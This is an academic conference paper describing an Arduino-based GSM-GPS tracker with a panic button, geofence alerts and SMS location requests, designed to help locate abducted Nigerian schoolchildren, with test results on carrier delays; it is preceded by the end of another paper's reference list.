Comput. Sci. Res. [S.l.] 4(1) (2022). ISSN 2630-5151. https://ojs.bil publishing.com/index.php/jcsr/article/view/4271. Accessed 28 May 2022. https://doi.org/10. 30564/jcsr.v4i1.4271 25. Rahaman, S., et al.: Cryptoguard. In: Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security (2019). https://doi.org/10.1145/3319535.3345659
Python Cryptographic Secure Scripting Concerns
613
26. Acar, Y., Stransky, C., Wermke, D., Weir, C., Mazurek, M.L., Fahl, S.: Developers need support, too: a survey of security advice for software developers. In: 2017 IEEE Cybersecurity Development (SecDev) (2017) 27. Muske, T., Khedker, U.P.: Efficient elimination of false positives using static analysis. In: 2015 IEEE 26th International Symposium on Software Reliability Engineering (ISSRE), pp. 270–280 (2015). https://doi.org/10.1109/ISSRE.2015.7381820 28. Thung, F., Lucia, Lo, D., Jiang, L., Rahman, F., Devanbu, P.T.: To what extent could we detect field defects? an empirical study of false negatives in static bug finding tools. In: 2012 Proceedings of the 27th IEEE/ACM International Conference on Automated Software Engineering, pp. 50–59 (2012). https://doi.org/10.1145/2351676.2351685 29. Chess, B., McGraw, G.: Static analysis for security. IEEE Secur. Privacy 2(6), 76–79 (2004). https://doi.org/10.1109/MSP.2004.111 30. Sphinx-Quickstart: Prospector - python static analysis. Webpage (2014). https://prospector. landscape.io/en/master/index.html 31. Brown, E.: PyCQA - Bandit. GitHub (2022). https://github.com/PyCQA/bandit 32. Luminousmen. “Python static analysis tools.” Webpage (2021). https://luminousmen.com/ post/python-static-analysis-tools 33. Ruohonen, J., Hjerppe, K., Rindell, K.: A large-scale security-oriented static analysis of python packages in PyPI. University of Turku, Finland, vol. 1, pp. 1–10 (2021) 34. Github: GitHub. https://github.com/. Accessed 28 May 2022 35. Local Coder: Python: ignore ‘incorrect padding’ error when base64 decoding. Webpage (2022). https://localcoder.org/python-ignore-incorrect-padding-error-when-base64-decoding 36. Projects: Linux Foundation, 28 June 2022. https://www.linuxfoundation.org/projects/. Accessed 30 June 2022 37. Kannavara, R.: Securing opensource code via static analysis. In: 2012 IEEE Fifth International Conference on Software Testing, Verification and Validation, pp. 429–436 (2012). https://doi. org/10.1109/ICST.2012.123 38. M2: Insecure data storage: M2: Insecure Data Storage | OWASP Foundation. https:// owasp.org/www-project-mobile-top-10/2016-risks/m2-insecure-data-storage. Accessed 28 May 2022 39. Enforcing security for temporary files. SpringerLink, 01 Jan 1970. https://link.springer.com/ chapter/10.1007/978-1-4302-0057-4_15?noAccess=true#citeas. Accessed 28 May 2022 40. IBM explores the future of Cryptography: IBM Newsroom. https://newsroom.ibm.com/IBMExplores-the-Future-of-Cryptography 41. Chen, Z., Chen, L., Zhou, Y., Xu, Z., Chu, W.C., Xu, B.: Dynamic slicing of python programs. In: 2014 IEEE 38th Annual Computer Software and Applications Conference (2014). https:// doi.org/10.1109/compsac.2014.30
Developing a GSM-GPS Based Tracking System: Vulnerable Nigerian School Children as a Case Study Afolayan Ifeoluwa(B) and Idachaba Francis Covenant University, Km. 10 Idiroko Road, Ota, Ogun State, Nigeria [email protected]
Abstract. GSM-GPS based tracking technology has been implemented in several problem-solving approaches that involve the use of some sort of geolocation, most prominently in vehicular tracking systems. In Nigeria, schoolchildren have become increasingly vulnerable as a result of an unending tally of school invasions and abductions. Efficient initiative in securing the future of Nigeria in its children has yet to be taken. Industry can meet the government in the middle through the employment and improvement of currently existing GSM-GPS based tracking technology. The goal of the tracker detailed in this paper is to incorporate GSMGPS based technology in a real-time monitoring system for children, employing an Arduino microcontroller as its central processing unit. If contracted and used as a deterrent against terrorism-related mass abductions in Northern Nigeria, where children are especially vulnerable and without the necessary resources to purchase a sophisticated tracking system, it could be considered a business-to-government (B2G) model and not a strictly commercial venture. Keywords: GSM-GPS · Schoolchildren · B2G
1 Introduction Counting the number of recent school abductions in Nigeria is both sobering and frightening, especially for academics from formal education institutions. At this present moment, most analyses have failed to examine these abductions beyond the spectacle of their audacity, details of the abduction itself, and the identification of perpetrators [1]. The focus on culpability for the attacks—or the avoidance of culpability—obscures the crucial focal points of these tragic events; the time-sensitive restoration of these children to their families and the implementation of a sustainable and long-term solution to the problem [1]. Since 2014, approximately one thousand four hundred schools have been lost, with approximately one thousand two hundred and eighty school staff and schoolchildren as casualties [2]. Even excluding terrorism-related mass abductions, which is a primary motivation for this paper, about a thousand and five hundred schoolchildren in states across the nation, especially girls, have been abducted by armed bandits in various instances between 2014 and 2021 for ransom and other sinister purposes [2]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 614–634, 2023. https://doi.org/10.1007/978-3-031-28073-3_43
Developing a GSM-GPS Based Tracking System
615
A tracking system can be used to respond to these elementary sources of risk in Nigerian schoolchildren to significantly reduce their vulnerability. Using proposed GSMGPS-based technology to develop a tracker affixed to a child, which combines basic GSM (Global System for Mobile Communication) network data transmission and GPS (Global Positioning System) position locating features, the real-time location of abducted or missing children can be determined. 1.1 Vulnerability Points in Nigerian School Children as a Basis for Tracker Functionality A review on vulnerability in Nigeria, vulnerability in children as opposed to adults and vulnerability in children in Nigeria was carried out to provide bases for the tracking system’s functionality, making allusions to add-ons to the tracker as a result of these vulnerability points. Vulnerability in Nigeria. Nigeria’s current insecurity situation has eaten deep into the nation’s roots, manifesting itself across all 36 states in forms of armed and unarmed banditry, fraud, corruption, kidnappings, religious and political violence, rape, cultism, ritual killings, insurgency and child abductions. The incapacity of the national security implementation framework to lessen the vulnerability of Nigerian residents has exacerbated the country’s internal security situation, particularly since the country’s restoration to democracy [3]. Vulnerability in Children as Opposed to Adults. Adults are largely invulnerable solely considering internal factors, as they are individuals with fully matured cognitive capacities, meaning that they can make intelligent and informed decisions concerning their well-being [4]. However, external factors like threat and endangerment can understandably decrease this level of invulnerability. Contrariwise, when considered singularly and set apart from a guardian or parent, children are prospectively the most vulnerable individuals in society, considering both internal and external factors. Merging these internal and external factors and applying them to conjured situations, we can evaluate the prospect of vulnerability in children as opposed to adults under the following proposed isolated conditions: a) Firstly, the condition of making intelligent and informed decisions as a precautionary to danger. Illustrations of this condition include actions that adults commonly take preluding exposure to danger, such as sharing locations with friends and family, remaining on high alert in potentially dangerous environments, possessing lowintensity weapons such as tasers, pepper sprays, pocket knives for self-defence; all measures which children have not yet developed the cognitive capacities to reason out or the initiative to take. b) Secondly, the condition of having a higher probability of falling into a dangerous situation or being targeted by a dangerous individual. Children are smaller in stature, have inadequate traffic experience, quickly lose attention [5] and are mostly extremely naïve. These qualities increase the likelihood of children as opposed to adults losing stock of their surroundings and consequently going missing or falling
616
A. Ifeoluwa and I. Francis
into dangerous situations. Children, also by reason of their physical, psychological and knowledge capabilities, together with their unsuspecting natures, are particularly vulnerable [6] and ultimately preferred by dangerous persons as they can easily be convinced or overpowered into dangerous situations. c) Thirdly, the condition of being conscious of when their safety has been compromised and that they have been placed in a dangerous situation. As opposed to adults, children are usually unaware of when they are at risk and can be easily convinced otherwise in the event that they are with a dangerous individual and in a dangerous situation. d) Lastly, the condition of being able to take steps if in the unlikely chance of coming to the understanding of a dangerous situation. Inherent qualities of children sparsely mentioned above render them mostly incapable of ejecting themselves from dangerous situations, especially perilous situations involving adults who can effortlessly outsmart and circumvent any efforts they make. Vulnerability in Children in Nigeria. Henceforward, children in this paper will be considered in the context of being without their parent or guardian, as is the case with schoolchildren for the duration of the day they spend at school and for most, on their way to and from school. We have established that when considering the vulnerability and by implication the safety of children, we need to be particularly sensitive as opposed to considering the same for adults because even adults are rendered vulnerable under certain insecure conditions. Al-Dawamy and Sulaiman (2010) in Mariana et al. (2017) observed a growing prevalence of crime against schoolchildren each year, in that walking to school is now extremely unsafe [6]. Recently, even at school, children are also left exposed to all sorts of danger, in an unending tally of school invasions. Hundreds of children were taken from Nigerian schools between December 2020 and August 2021 [1]. According to the July 2021 Report of the United Nations Children’s Emergency Fund, UNICEF, more than nine hundred and fifty schoolchildren were abducted from schools primarily in North-West Nigeria and other regions in the country in seven months (December 2020 to July 2021) [2]. At one point, nearly 500 students were abducted in four isolated instances spanning just six weeks across North-Central and North-West Nigeria in 2021 [2]. There were at least twelve mass abductions and four attempted in total in just nine months between December 2020 and August 2021, causing a nationwide outrage over the government’s apparent incapacity to deal with and avoid similar tragedies [1]. The tracker proposed in this paper will be designed to locate any individual or thing and either adult or child, but its high point is that its design will incorporate solutions particularly for these emphasized vulnerability points of children. These vulnerability points will be included in the tracking system’s design by considering conditions three (c) and four (d) of the four previously defined conditions in the preceding subsection. For instance, though there will be the inclusion of a panic button in the case an abducted individual comes into the understanding that they have been put in danger, most children will not come to this understanding as has been established under condition three (c). To accommodate this excess, the design will include a feature that automatically sends the child’s coordinates to inform their guardian of when they have left more than 50m
Developing a GSM-GPS Based Tracking System
617
of a pre-set location, for example, school, or have left a particular walking route pre-set by that guardian. Using these technology-based location finders with practical and reasonable precision and response time in the recovery of the abducted child also compensates for children’s general inability to eject themselves from dangerous situations, as was established under condition four (d), effectively accommodating yet another vulnerability point of children.
2 Literature Review GSM-GPS technology has been implemented in problem-solving approaches involving the use of some sort of geolocation, most prominently in vehicular tracking systems. This paper’s approach to utilizing that technology in a slightly more sophisticated version for geolocation and the enhancement of individual security—children inclusive and primarily considered— is one of the few available. In order to select the most feasible components, circuit configuration and overall design for this proposed tracking system, it is necessary to review previous works related to the GSM-GPS technology. This is to either choose the most suited approach, utilize the features of some approaches’ or modify and build upon one of these existing approaches. 2.1 Review of Related Works Lee Chun Hong in [8] designed a child-tracking system to allow parents keep track of their kids when their child is out of their view. Both software and hardware and different UML (Unified Modelling Language) diagrams were designed in ensuring the aim of the system. GPS modules serve as the core in ensuring the hardware functions as expected. Test users reported that the system works in a very efficient manner, and the software developed has also been described as user-friendly and efficient in tracking. It largely depends on GPS and the network connection of the devices and its operation on the Google Application Programming Interface (API) and is observably too expensive for the users, this paper’s intended tracker will be catering to. Authors of [9], designed a real-time vehicle tracking system that operates via GPS and GSM technology using an AT89C51 Microcontroller, interfaced to a GSM modem and GPS receiver. The GSM modem sends the position of the vehicle from a remote place while the GPS modem aids in giving continuous data in real-time. The system then sends a reply to the mobile connected to notify the user of the location and position of the vehicle. The system was designed secondarily however to monitor driver behaviour but was unable to achieve this in theory. Using Open-Source Technologies, [10] developed a system that manages and controls the transport using a tracking device to know the scheduled vehicle and the current location of the vehicle. It was developed using a GPS-tracking device which is executed to work via SMS on a device. Satellite technology is also implemented with advanced computer modelling to track vehicles with a server and another application enabling the tracking function. Passengers are able to use this system to board a bus, be informed of
618
A. Ifeoluwa and I. Francis
their current location and get information on the total number of passengers in the bus. The SMS functionality was however not very quick in receiving updates at times. Eddie Chi-Wah Lau in [11] developed a tracking system for two campuses in a University in Malaysia, which aids in tracking down the position of the campus buses. The system is made up of 2.4G network facilities which include an outdoor LED (Light Emitting Diode) panel, Base Station (BS), voice system, smartphone access, server, bus transceiver, BS Transceiver, an IVR System and the university’s existing network for data access. The Outdoor LED Panel is used to enable notifications or updates outside the bus and the BS for database updates, bus detection and information display. The IVR System aids in broadcasting the current time and bus status when a call has been put on by students, as seen on the GSM board. However, the system is quite complicated and is not designed to give the exact position of buses, just vital information on the arrival/departure of buses per station. In [12] a system for tracking vehicles on land is designed. The system is made up of a tracking system, a monitoring and control system, and an android application. The tracking system consists of a GPS device installed that sends the data calculated to a server while the monitoring and control system enables data access from the server on the web application. Finally, the android application enables data access from the server on the mobile application via the internet. This system is able to perform five (5) major functions which include, the addition of vehicle details, setting of route and destination, calculation of the speed of a vehicle; map display of the vehicle being tracked; and, setting alarms. Most of these functions are not adaptable to this paper’s tracker’s intended use case. The tracking system using GSM-GPS technology in [13] was developed to track the information of a lost child via Google Maps, and the location of the child through GPS. Its hardware components include Arduino Uno, GPS Module and a GSM Module (SIM900A). Its basic software requirement is the Open-Source Integrated Development Environment (IDE). GPS calibrates the position of the child/children, GSM sends the information to a registered guardian’s mobile number with the help of SMS, the IDE is used to ensure computed code is successfully uploaded on the physical board and Google Maps ensures the accuracy of the calibrated location. The authors point out that with further work, a high-scale deployment for child tracking can be accomplished. In [7], a handheld positioning tracker based on GPS/GSM was developed for tracking civilians and transport vehicles. The hardware circuit design consists of a STC12C5A60S2 CPU microcontroller, GPS/GSM Module and a TFT (Thin Film Transistor) LCD display. The microcontroller is able to aid in the reading of GPS location parameters and other information data. Though the system is very flexible, portable, convenient and has a stable performance, it does not consider precision in cases of individual tracking. The GPS and GSM Based Tracking system in [14] was designed for people in various conditions like fishermen, soldiers, aged people and girls, using a GPS system, a GSM modem, an ARM7 LPC2148 Microcontroller, a heartbeat sensor, an LCD display and a vibrator. The GPS system ensures the locations of lost persons are calibrated. It then passes information generated to the GSM modem which ensures it gets to the appropriate person. Furthermore, a heartbeat sensor is included to evaluate the state of the individual
Developing a GSM-GPS Based Tracking System
619
being tracked —alive or dead— and a buzzer to alert someone in the case that the tracked individual is in danger. This system developed is proven to prevent fishermen as well as other vulnerable humans from getting lost and if lost at all, locating their whereabouts. However, the system is observably briefcase-sized and the authors point out that it takes time to send location information data and numbers if the predefined phone numbers are greater than three. Global System for Mobile Communications (GSM) and Global Positioning System (GPS) were the key technologies employed by the tracking system in [15] to complete its stated objectives. The major objective here is to identify children and track them in the region designated for them. The device is simple to operate and may be worn as a wristwatch, tucked within the child’s clothing, or attached to their belt. The tracking device is triggered when the kid leaves the boundaries of the region that has been designated for him, and a warning message is sent to the person keeping track of him to ensure that they are aware of the child’s new location. SMS which allows the user to connect with the GSM remotely using a mobile phone can be used to activate the tracker. Excellent results from this tracker’s testing at a school were obtained. This system has features that can be adapted to this paper’s use cases. The authors indicate that the system may be improved by adding other features. The system developed in [16] is made up of an Arduino microcontroller and a GPS and GSM kit. The system also includes an alarm button. Parent and child modules were designed and linked to a web server and the web server functions as a middleware between the two components. The main purpose of the device was to find lost or missing children and to guarantee their protection to their parents. The method put out in this article makes use of a number of characteristics that Android smartphones provide. A limitation of the system is the middleware’s susceptibility. A smartphone and an Arduino Uno were the technologies that were effectively used in the proposed vehicle tracking system in [17]. Arduino is cheap and simple to integrate into a system, in comparison to other options. The built-in device uses GPSGSM technology, one of the most popular methods for vehicle tracking. In order to transmit and receive messages from other GSM numbers, this paper employs a GSM module. The location and name of the site are then shown on mobile devices via Google Maps. As a result, the smartphone user is able to continually track a moving car on demand and predict the distance and arrival time to a certain location. The vehicle owner must send a location request message first if they want to know where the car is. Finally, in [18] an “On-Board Module” for a tracking system was designed and located in the target vehicle. The system can monitor objects and offers the most recent information on active trips because of the use of GSM and GPS technology. Realtime traffic surveillance is where this technology is most utilized. An SMS message may be used to report an object’s location while it is moving. A limitation however, is that there will be a range problem if the car crosses a particular border, in which case the tracker’s memory card will not operate. 2.2 Review Results A review of works related to GSM-GPS technology was done, carefully examining the technology behind each type of electronic tracking, its associated costs, its complexity
620
A. Ifeoluwa and I. Francis
of implementation, its use cases as compared to the usage scope of this paper and its B2G nature. GPS technology is reinforced to be the best feasible option as it is a system that has already been implemented and can be utilised by anybody, anywhere on the globe, at any time, 24/7 and without limitation [19]. There are no setup or subscription costs, and GPS positioning technology is not only mature, widening its breadth of use, but it also lowers the cost of a range of product development processes. The majority of portable positioning trackers on the market can only perform GPS self-positioning, however, GSM-GPS technology properly combines GPS positioning with GSM wireless data transmission, resulting in low-cost real-time monitoring on the tracking side [7]. It is important that the tracker be low-cost and uncomplicated as it is intended to be mass-produced and to primarily serve areas where guardians and parents might be unable to afford a high-cost version, low-cost version or even any version at all. GPS works in any weather conditions, albeit sometimes limited by them but it gives the name of the street that its receptor is travelling on and can also give us the exact latitude and longitude of where it is located when working without any interference. The tracker’s scope of usage allows for this limitation due to weather interference, given that the exact indoor positioning of any abducted schoolchildren does not need to be known. Information about the street or building location of the abducted is more than enough for even the most unreliable of security forces to retrieve the missing child. This will be explained further and proposed components for the tracker based on the review carried out will be provided in the following section.
3 Methodology The tracker’s generally defined system requirements in summary, are to design and implement a tracking system for any private individual looking to enhance their own personal security. However, in its consideration of children, the paper’s primary compulsory requirements become: 1. The system should be designed considering the inherent helplessness and vulnerability points of children. This can be done by ensuring that asides from the inclusion of a panic button which children might not have the ingenuity to use, guardians can also receive the location of their wards on demand and on a case-by-case basis. Interrupts sent to a central processing unit in form of a microcontroller using GSM/GPRS technology can be established to achieve this system requirement. This means that an SMS in form of an interrupt can be sent from an authorized number requesting the immediate geolocation of the tracker and also, the location of the tracker can be retrieved when it leaves a predefined location. 2. The system should also be designed to accommodate its social justice and B2G mass production theme by considering the following: i. Minimized complexity and ease of implementation of the technology: Since the paper’s primary objective also includes possible mass production and contraction by the government or NGOs to solve the problem of abduction of vulnerable school children in Nigeria, ease of implementation and minimized complexity of its design is extremely necessary. GPS technology as the primary tracking technology has
Developing a GSM-GPS Based Tracking System
ii.
iii.
iv.
v. vi.
621
been established to fulfil this system requirement from the reviews carried out in the previous chapter. Cost-effectiveness for vulnerable school children in Nigeria: Children in Nigeria most affected and prone to abduction are situated in extreme poverty areas and the cost-effectiveness of the tracker has to be considered. This is brought into consideration for guardians to attempt to purchase or to encourage non-governmental bodies or the government itself, to purchase a large number for distribution. Reasonable Level of Precision: This means that extreme sophistication of the tracker is not required. An instance is pinpointing the exact location of the child indoors. This is because only a reasonable level of precision is needed for even the most inefficient of security forces to launch a rescue operation in form of a calibrated building location or street name. This aids in the cost-effectiveness discussed previously as well. Ease of Usage: Parents or guardians with any literacy level should be able to properly use and configure the tracking system’s interfaces and know how to either utilize the tracking system in times of an actual emergency or in cases of extreme illiteracy solicit the help of the nearest averagely literate individual who can retrieve the information and then notify the authorities. Concealable: The tracking system should be as concealable as cost constraints can allow, in order to avoid detection by abductors or kidnappers. Prolonged system operation: The system has to be capable of sustaining itself for an extremely long period of time, as its scope of usage in terms of time is for the entire estimated eight-hour duration when children are away from their guardians when in school. This means its power unit or power source has to be extremely long-lasting.
To that end, the proposed components for this paper based on the analysis of these requirements as well as the comparative reviews done in chapter two are enumerated in the subsection below. 3.1 Hardware Components The chosen hardware components for this tracker are made up of the following units: I. II. III. IV.
Input Unit Communication Unit Power Supply Unit Control Unit (Central Processing Unit) These units are interconnected as depicted in Fig. 1.
Input Unit. This unit is made up of a panic push button which when pressed, causes the system to send an emergency location-bearing SMS in form of a google maps link to the person whose phone number is registered in the system. Input can also be done through a location request interrupt sent to the microcontroller via a location-request SMS from the registered phone number or the tracker exceeding a pre-set location.
622
A. Ifeoluwa and I. Francis
Fig. 1. Block diagram of the system
Fig. 2. Panic push button [20].
Figure 2 is a pictorial representation of the panic button which functions as an input to the system. Communication Unit. This unit comprises of the SIM800L GSM module and NEO6m GPS module. The GPS module gets the location of latitude and longitude data, while the GSM module sends the emergency location-bearing SMS to the person whose phone number is registered in the system.
Fig. 3. SIM800L GSM module [21]
Figures 3 and 4 are pictorial representations of the SIM800L GSM Module and NEO-6m GPS Module respectively. The module containing the SIM links the user and the tracking system. It communicates serially with the Arduino and connects wirelessly to the user through the mobile network. The module in the tracking system is connected to the Arduino through the
Developing a GSM-GPS Based Tracking System
623
Fig. 4. NEO-6m GPS module [22].
transmitter (TX) and receiver (RX) pins. The GSM and GPS modules work together and are attached to the Arduino board, obeying the instructions that come from the microcontroller. The GSM module connects to a mobile network through a SIM card and sends the location-based SMS when the panic button is hit, the tracker exceeds pre-set location and/or the registered number makes a request to the system via SMS. Control Unit (Central Processing Unit). Arduino technology was chosen as the control unit technology utilised in this system. Arduino boards are usually employed in microcontroller programming. It is a circuit layout containing a chip that can be instructed to carry out a sequence of commands. It sends data from the computer software to the Arduino microcontroller, which then sends it to the appropriate circuit or to a machine with numerous circuits to carry out the request. Arduino Nano. The Arduino Nano’s Atmega328 microprocessor is identical to the one in the more widely used Arduino Uno. It has two 22 picofarad ceramic capacitors, a reset button, and a 16 MHz crystal oscillator. It may be employed in a number of circumstances due to its small size and versatility. On this board, there are twentytwo input/output pins, eight analogue and fourteen digital pins and the crystal oscillator has an operating voltage of 5 V. It also has a USB connection for uploading and supports a range of communication protocols, including serial, I2C, and SPI (Serial Peripheral Interface). To give USB power and communication to the board, the six-pin header can be connected to an FTDI (Future Technology Devices International Limited) cable or Sparkfun breakout board. This board was designed for partly permanent installations. It permits direct soldering of wires and the use of many kinds of connectors since it comes with headers that are not yet mounted. SparkFun Electronics manufactured this Arduino Nano board. Figure 5 is a pictorial representation of the Arduino Nano microcontroller. It is the brain behind the tracking system. The control unit is made up of this Arduino Nano board which was programmed with C++ programming language in Arduino integrated development environment (IDE). The Arduino Nano microcontroller contains a 32-kilobyte flash memory and a 2kilobyte bootloader. The SRAM memory is 8 kilobytes in size, while the EEPROM memory is 1 kilobyte in size. Figure 6 is a pictorial representation of the circuitry of the control unit.
624
A. Ifeoluwa and I. Francis
Fig. 5. Arduino Nano microcontroller [23].
Fig. 6. Circuitry representation of the Arduino nano control unit [24].
Power Supply Unit. The TP4056 battery charger, switch, 3.7 v battery and MT3608 voltage boost converter constitute the power supply unit. A charging circuit 3.7 V–4.2 V, is designed to charge the system. This power module is significant as it informs of the total power the system is redistributing and using. All other subsystems are interconnected to this board for power. The charge controller monitors the battery’s voltage and when full, shuts down the circuit, which stops the process of charging. The charge controller is very important to the entire device as it must function as intended, for the device to work efficiently. The system is powered by a rechargeable 3.7 V 3800 mAh battery. The switch either connects or terminates the circuit, to make sure the system is only functioning when turned on. This efficiently conserves power. The MT3608 converts the voltage from 3.7 V to 12 V, which is then supplied to Arduino board’s Vin pin. The inbuilt voltage regulator on the Arduino board transforms 12 V into 5 V. 5 V is used to power the Arduino board, LCD, and SIM800L GSM module.
Developing a GSM-GPS Based Tracking System
625
Estimating the device’s total voltage and current consumption, we can multiply the total current and voltage of the system to get its power consumption. The system is powered by a 5 V battery, which will provide the necessary power to handle the system’s load. Calculations: Operating current at standby = 45 mA
(3.1)
Arduino board Operating voltage = 5 V
(3.2)
Power ratings with no power supplied is 5 V × 45 mA = 0.225 W
(3.3)
DC current in each I/O pin = 20 mA. Suppose 10 I/O pinsare used, Current used in total by I/O pins = 20 mA × 10 = 200 mA
(3.4)
Therefore, Total powerusedby I/O pins = 5 V × 0.2 A = 1 W + 0.225 W = 1.225 W (3.5) P(W ) = IV
(3.6)
where, I = Total current; V = Total voltage. Table 1. Summary of hardware component units S/N
Unit
Component information
1
Input unit
a) Panic button b) GPS module c) 5V input voltage d) ATmega328 Microcontroller chip
2
Communication unit
GSM module
3
Control unit
Arduino Nano
4
Power unit
a) 3.7 V Li-Po battery b) TP4056 Li-Po battery charger c) MT3608 voltage boost converter
Table 1 gives a compact representation of all units and their respective constituting components.
626
A. Ifeoluwa and I. Francis
3.2 Software Components The Arduino board in the system was programmed with C++ programming language in Arduino integrated development environment (IDE). The Arduino IDE software is used to configure the Arduino Nano Microcontroller and the SIM800L module to pick up location signals via the google maps API from the satellite and deliver this data to the mobile number registered to receive it. 3.3 System Flowchart As can be visualized in Fig. 7, all modules are started and initialized at the beginning of the program. The system then continually checks to see whether the panic button has been pressed, if a location request message has been sent by an authorized user and/or if the tracker has exceeded its pre-set location. If none of these has been done, it continues to check and store the most recent location data until the system is turned off. If any of the checks return a positive response, it locates the user using the GPS module, sends the location SMS to the registered number and reinitializes after five minutes, beginning the entire process again until the system is turned off.
Fig. 7. Tracker’s flowchart.
Developing a GSM-GPS Based Tracking System
627
4 Result and Discussion The tracker is controlled by a microprocessor. The Arduino is interconnected to every component of the device. The hardware components are connected to its allocated Arduino pin with unique functionalities. 4.1 Circuit Diagram
Fig. 8. Tracker’s circuit diagram.
As seen in Fig. 8, a Software Serial connection links the GSM module to the PC. Its reception pin (Rx) is linked to digital pin 3 of the Nano board (D3) and its transmitter pin (Tx) is linked to digital pin 2 (D2). The GSM module is wired to be powered directly by the 3.7 V power source of the Li-Po battery. The GPS module (Neo-6m) is connected via a software serial mechanism or protocol. The module’s Rx pin is linked to the Nano’s digital pin 11 (D11) and its Tx pin is linked to the digital pin 10 (D10). The 5 V power supply rails are connected using a parallel connection to the Nano’s power rails. The Li-On battery is connected to a charging module with a 3.7–4.2 V output voltage range. It was modified to output 5 V power by altering the variable resistor on board the module. While the GSM module is powered by the 3.7 V battery, a two-pole switch isolates electricity to the modules that are not in use, which enhanced the overall design. A computer program was written in C++ and run using the Arduino IDE to control the circuit. The Arduino has a serial port, through which its programming circuit is connected to the computer’s serial port, allowing for computer code to be loaded into the Nano’s memory. The code is used to configure the appropriate pins to form connections to the microcontroller from the various I/O systems. Tracker Schematic. A schematic of the developed GSM-GPS tracking system is shown below in Fig. 9. The ‘toggle on/off button’ in the form of a red switch is visible as seen below and the panic button is on its other side.
628
A. Ifeoluwa and I. Francis
Fig. 9. Completed GSM-GPS based tracking system.
The SIM slot is located on the right of the ‘toggle on/off switch’, and an indicator that the system has been powered on and/or is charging is located on its left. Below the ‘on switch’ is a USB charging port for charging the tracker’s battery and on the right side of the body of the tracker is the port for accessing the microcontroller and configuring it on the Arduino IDE. Its dimensions are 15 cm × 8 cm × 5 cm and can be masqueraded into pencil cases, bag straps and textbooks.
4.2 System Operation After assembling both hardware and software, the following system functionality was achieved in the following sequence of steps. Step 1 (Turning on the Tracker): Once the red button on the device as can be seen in Fig. 9 is toggled from off to on, all modules are started and initialised, beginning the program. Upon initialization system will activate the GSM module, and it will start operating. Step 2 (Searching for Network): Once initialized with a SIM inserted and positioned in the tracker accurately, the GSM module will look for network support. The GSM module’s LED flashes about six times every second at first, then once every three seconds after it detects network support. In the absence of good signal presence, the LED will flash every second, and an error will occur, leading to communication inefficiency until the tracker gets in the vicinity of good signal presence. Step 3 (System establishes network connection): If the connection is established, the GPS module initializes, the serial port will be available for communication, and the GSM module will enable SMS transmission and communication with Arduino via the panic button input and location request interrupt SMS messages. Step 4 (Tracked individual toggles the panic button, exceeds pre-set location and/or location request is made by a registered number): System reads and stores current location data and continually checks to see whether the panic button is pressed, pre-set location has been exceeded and/or if a location request message has been sent by an authorised user. If none of these has been done, it continues to store location data and check until the system is turned off. If any of the checks return a positive response, it sends the most recent location data via SMS to the registered number in form of a google maps link. It
Developing a GSM-GPS Based Tracking System
629
then reinitializes after five minutes and reinitiates the process from Step 1 until stopped or turned off.
Fig. 10. (a) and (b). Screenshots of the functionality of the tracker.
A screenshot of the functionality of the GSM-GPS based tracker is provided in Fig. 10(a) and (b). In both uses of the tracker, it is located at the Lecture Theatre at Covenant University, Ota, Ogun State and the holder of the registered mobile at Dorcas Hall, Covenant University, Ota, Ogun State. Its pre-set location was also Dorcas Hall. Figure 10(a) shows an emergency message received by the holder of the registered phone number once the tracker initially leaves more than 50 m of Dorcas Hall and then more messages every five minutes as the tracker reinitializes and is met with the same conditions. One emergency message is also sent when the tracker’s panic button is pushed. In Fig. 10(b), the holder of the registered mobile number sends a location request to the tracker three times to which it responds thrice with the tracker’s location. The tracker’s location in both test runs is sent in a google maps link format as can be seen in the above figures, which takes the holder of the registered phone number to the tracker’s calibrated position as seen in Fig. 11. This position was accurate to two metres, giving the building location but not the exact room the tracker was located in. Testing was also carried out in three separate locations with similar results as the above noted in all. 4.3 Performance Tests In the process of testing the overall system, there was a pattern of delay observed in the SMS transmission of the tracker’s location depending on the carrier being utilized. Building on the notion that the system should receive this location as quickly as possible, especially if the individual being tracked is in an extremely time-sensitive emergency, the fastest carrier response was sought out by testing a number of the different carriers
630
A. Ifeoluwa and I. Francis
Fig. 11. Tracker’s location sent and seen via Google maps.
available. In real-life usage however, the different SIM card combinations of the GSM module and carrier of the registered number could always be a factor affecting delay. It should also be noted that the location of the testing and the location of the eventual use of the tracker could influence delay, as different locations have varying carrier strengths depending on network technology, cell infrastructure and the number of users in that area. This lag analysis performance test was only carried out to note the carrier with the best chance at overall reduced delay for incorporation in the GSM module, since the carrier of the registered number for receiving and requesting location messages cannot be controlled. Airtel, Glo, MTN and 9mobile were the four carrier SIM cards utilized, and Table 2 shows the results of the performance tests. Table 2. Summary of all GSM module carriers tested against varying mobile carrier recipients Airtel GSM module (sec)
Glo GSM module (sec)
MTN GSM module (sec)
9mobile GSM module (sec)
Airtel registered mobile no. (sec)
55
105
102
114
Glo registered mobile no. (sec)
102
95
110
121
MTN registered mobile no. (sec)
89
110
62
119
9mobile registered mobile no. (sec)
92
121
98
87
Developing a GSM-GPS Based Tracking System
631
Table 2 depicts a summary of the performance analysis of the different GSM module and registered mobile number combinations. It is also pictorially represented in Figs. 12 and 13 for easier analysis.
Fig. 12. GSM module carriers tested against varying mobile carrier recipients
As depicted in Fig. 12, which displays the results of the delay average taken with respect to the carriers in the GSM module, the carrier with the best chance at a lower delay in transmission, regardless of whichever carrier the registered phone number used, is the Airtel carrier. This carrier was employed in the tracker prototype built. It was also observed that employing the same carrier in this carrier-to carriertransmission reduced transmission delays significantly, with Airtel-Airtel transmission having the lowest delay all in all. In this way, since the carrier of the registered mobile number cannot be controlled, the trackers could be manufactured allowing for varying carriers and then marketed as being best purchased with the tracker’s carrier matching the number to be registered. For example, in the instance a user wants to purchase this tracker for themselves or for loved ones, most particularly our vulnerable Nigerian schoolchild, the best carrier to purchase will be one matching the mobile number of the guardian registered to be receiving the tracker’s location and sending location request SMS messages.
632
A. Ifeoluwa and I. Francis
Fig. 13. Delay average taken with respect to carriers in GSM module.
